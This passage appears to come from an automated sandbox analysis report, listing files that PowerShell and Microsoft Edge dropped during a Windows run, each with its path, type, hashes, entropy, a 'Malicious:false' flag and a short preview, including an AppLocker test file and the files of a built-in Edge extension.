                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wecc1qqp.voo.ps1

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):60
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\a2812c05-d9ff-4c9e-b083-a39b9674afcc.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):206855
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                                                                                              MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                                                                                              SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                                                                                              SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                                                                                              SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1420
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.442599256578506
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:Yac54VJfe54V80NBgu5SBxK0Npm25Spe0TxqXIp5r7qJ0MWhu5nJVjBu0MJVPL5M:Yac5oJG5o807d54xK07m25Ee0TxqXIpw
                                                                                                                                                                                                                                                                                                                                                              MD5:C075597C9A6FE3C986A8651504B987FC
                                                                                                                                                                                                                                                                                                                                                              SHA1:EA32537EA2C7BB8120B1472689AE315E73CF08DA
                                                                                                                                                                                                                                                                                                                                                              SHA-256:043467E81A185D82104F2C33D44CC4EBCD3BD4627C90F5EC9C3074699EE507C4
                                                                                                                                                                                                                                                                                                                                                              SHA-512:8312839D181CDFAF3E637B4132B4C79DD33094E917D766FCCEB38F70723632FD44CCAC5FDB9472C7CF781D9CE48C24978A47055CAB6DF8A501B349AB58076B7F
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{"logTime": "1005/094927", "correlationVector":"2Yoymfq2DNqKkEQxScdye6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/094932", "correlationVector":"f8obPuKjAlRxEct+yTS+WU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/094932", "correlationVector":"3424AD3BF2D647858C80467BB9A206FC","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/102334", "correlationVector":"R7sA2ORjmzFG+jb9x+Jiab","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/102334", "correlationVector":"C4F87C103BB24B0EA24A826332D35037","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/102550", "correlationVector":"gABMZMZtO1erzif4SmQ7ja","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/102550", "correlationVector":"15ED17FAD0C64F2DB623BFAC8C77343C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/103007", "correlationVector":"+pZdWNzglJOCMtTzwL811z","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/103008", "correlationVector":"F3AB7FFA

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\d9356f76-a04a-4a3e-b65f-09fe66064718.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                                                                              MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                                                                              SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                                                                              SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                                                                              SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:.

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\dbcc090d-0d83-4f13-80c2-1ad2b5a93727.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 43845
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11332
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.981591645679679
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:Z0Sz9rG9aQQaWaOVgl36fKpU9tHrRgscIyZERFT/0PWSmjJ6l9SqnaDGiTo01tID:79rtHaW3VgGKp0tHrRpcIyZERF70+BDs
                                                                                                                                                                                                                                                                                                                                                              MD5:1174A14D2C0DA5CAD94BDCFCBB945E8D
                                                                                                                                                                                                                                                                                                                                                              SHA1:03BE2F9F4F186201111B14B12B918B6674D48DB0
                                                                                                                                                                                                                                                                                                                                                              SHA-256:FB6CFD7F620A4095E09F724EB309EAFC6FB9B1CA1261630BD91448F24E9613B0
                                                                                                                                                                                                                                                                                                                                                              SHA-512:2763BD05776E876B7734E856D27AEE73DEB1A8E4DEB719B5D679383C5328B126F7FAF586366861954829B820DD3AFD69E3468FCE6850A676B026ED05CEF9A3E1
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:...........}.w.6....W.<[G.)Y....I..{.6....=...EB.c.dI........E=.h.....H....`^.P7vTs...<.Y....,j\...6g>.l..a..j...v......w..j./>......G|:...........{jC..2...,..../.A..b{...F+.n.zwl.......t......?J....f.g=.K......P[p...O..Nm...o...N.O.N<.=..k..s..a.;=...D....B;..).l..)c..<o..h...H....9...Gb......:..`.U._.A.....4..l.+.;........T$. 8v..Ug}...(s.(o.]...#..O<....w.W.....O3J...M.....=<.v........:?v...........a........]....v..'.Q...)..}7.[.V..Y.cl.g.\3..5....!....m....CSh.N7,.AL.!ge.....l.N....gA...&.q...b.Gw.E..3;e.*.c.j..h..9.`.O'.4v.T.EA#k 1.U.r{a.e...$9Ap..@......6.[r....9L|..7..:\..../..^..p.hW.w.\.`.....-x....\..@...h.qx7.,.(k.:vB....I,.8...W..~...DD4[..u[........6.......v~..!C]..3IY.sV....t.f."*..1.....*...'..J;..3A)hO....B.6..g.7. .........=...|.&.^..X.rV..9..;,.'.].>jE.nn7.....y....;.A...\....M...9...v...YQU.I.~.....A...,.....*..4l..B..\.).a.,.T.....BA..^.1.........w.Uw.....&..9...s...(>.......n'.....h@..V.}V...:A&.?....3o......>

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_1957750649\7105245d-c10a-4c67-a804-a57c450989f3.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):11185
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                                                                                              MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                                                                                              SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                                                                                              SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_1957750649\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1753
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                                                                                              MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                                                                                              SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                                                                                              SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                                                                                              SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "eyJpdGVtX2lkIjoiam1qZmxnanBjcGVwZWFmbW1nZHBma29na2doY3BpaGEiLCJpdGVtX3ZlcnNpb24iOiIxLjIuMSIsInByb3RvY29sX3ZlcnNpb24iOjEsImNvbnRlbnRfaGFzaGVzIjpbeyJmb3JtYXQiOiJ0cmVlaGFzaCIsImRpZ2VzdCI6InNoYTI1NiIsImJsb2NrX3NpemUiOjQwOTYsImhhc2hfYmxvY2tfc2l6ZSI6NDA5NiwiZmlsZXMiOlt7InBhdGgiOiJjb250ZW50LmpzIiwicm9vdF9oYXNoIjoiQS13R1JtV0VpM1lybmxQNktneUdrVWJ5Q0FoTG9JZnRRZGtHUnBEcnp1QSJ9LHsicGF0aCI6ImNvbnRlbnRfbmV3LmpzIiwicm9vdF9oYXNoIjoiVU00WVRBMHc5NFlqSHVzVVJaVTFlU2FBSjFXVENKcHhHQUtXMGxhcDIzUSJ9LHsicGF0aCI6Im1hbmlmZXN0Lmpzb24iLCJyb290X2hhc2giOiJKNXYwVTkwRmN0ejBveWJMZmZuNm5TbHFLU0h2bHF2YkdWYW9FeWFOZU1zIn1dfV19",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_1957750649\CRX_INSTALL\content.js

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):9815
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                                                                                              MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                                                                                              SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                                                                                              SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                                                                                              SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_1957750649\CRX_INSTALL\content_new.js

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):10388
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                                                                                              MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                                                                                              SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                                                                                              SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_1957750649\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):962
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                                                                                              MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                                                                                              SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                                                                                              SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                                                                                              SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\07b78d21-445b-4e56-9434-90802f5e66f2.tmp

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):154255
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.844315193710191
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3072:IH0Gn9mK7OlWbWd/4yjbZH/FZnUO5wYrfzeIX74kwjFMziwmNfxL15tUyH:IUG9mKqlzgyjbZH/jUyLXUkwjF971FUi
                                                                                                                                                                                                                                                                                                                                                              MD5:240CD355E89EC1F3566BB2EF1F361DAD
                                                                                                                                                                                                                                                                                                                                                              SHA1:2ADE60EB20F0FB16657A4FB024D207A931DC927F
                                                                                                                                                                                                                                                                                                                                                              SHA-256:1F0388D23A4D8492E2F9839392B22A6957DEAE8750B60FF860EE939811594295
                                                                                                                                                                                                                                                                                                                                                              SHA-512:961FE2017949D185761D8491AB4F7F2EC3B0562CFB6FEF202C34D685A87F2EA032F53D653E4C1D492DFF1FB43D738E7727985738C1A956A1A18AAE77A3D7F3B6
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                              Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[..........gE5.*B1_+.)l\....n.sj.n.-.su....kM.`..w..k..u.L..G_9a ..=H..Ag.i.a. .&f!t....s. ............Fy.Cu..a9.C........f7...CW.e._.Zy.W.t.`z.B....k....|$......G.PI/x]_...L.j..<at...%w.....K,y......s&.....%.4)p...........-2)/....P.....H.;m...}.CP..$E....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E. $.I....D....h.n.8......y.|.{5.!.!..@.9.E.o..x...=..}..<.......W".%............mo.:......|F....|{H0..S._....0-.ChC..h.....:.....R%Z....u/.....Y_...8./....>.).....OogU.......P.W.a...._..c,..RH}.......m#3..2.U=.O...~....2.H.O...F..Y.j..2....o.......*.......6..?.........{........|.^....1s..H..#.'.O..Q_....+."

                                                                                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir6944_918814339\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4982
                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                                                                              MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                                                                              SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                                                                              SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                                                                              SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                                                                              Malicious:false
